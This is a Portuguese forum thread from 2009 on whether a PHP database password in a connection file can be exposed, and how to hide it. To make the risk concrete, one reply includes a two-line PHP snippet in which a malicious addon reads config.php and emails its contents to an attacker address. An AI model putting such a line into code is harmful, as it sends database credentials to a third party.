Dúvida sobre a senha da conexão do bd

[#Tigre]

Pessoal, tenho uma dúvida sobre a senha que vai na parte que faz a conexão com o banco de dados ("localhost",$usuario,$senha).

Tem algum risco de alguém ver esta senha através da página php? Ela fica ali "exposta" mesmo? ou tem algum jeito pra escondê-la.

[itibere]

Se você quiser proteger essa informação coloque em um arquivo .inc, e coloque como include no php.

depois vá no apache e configure para que ele trate os arquivos .inc.

isso vai fazer com que se alguém tentar ver o arquivo de forma direta o apache vai ocultar o conteúdo do arquivo.

Só um detalhe, o usuário só vai ter acesso ao conteúdo da pagina pegar se ele tiver acesso ao código fonte, pelo navegador ele só vai ver a saída htm, ou seja nada de php.

Editado Março 10, 2009 por itibere

[Norivan Oliveira]

Bom tem risco sim, dizem que o motivo da invasão no PHPBB.org foi exatamente acesso a senha do bd pelo arquivo de configuração, não sei se isso foi verdade mas isso seria possível.

Porque?

O usuário nunca iria ver pelo navegador o que tem dentro do seu arquivo de conexão (config.php) porque este arquivo é interpretado no servidor, no entanto, se seu sistema tiver hoje ou vir até algum dia algum addon de terceiros, por exemplo TEMPLATES, nada impede do cara fazer algo similar à:

$pegasenha = file_get_contents("config.php");
mail("pegador_de_senha@gmail.com","Mais uma senha de banco",$pegasenha)

E só ficar esperando a senha do seu bd chegar no email dele.

Umas das soluções que você pode adotar é a criptografia desse arquivo usando o ZEND GUARD, ION CUBE ou outros similares.

[#Tigre]

O mais comum é o pessoal usar assim mesmo ou com estas proteções?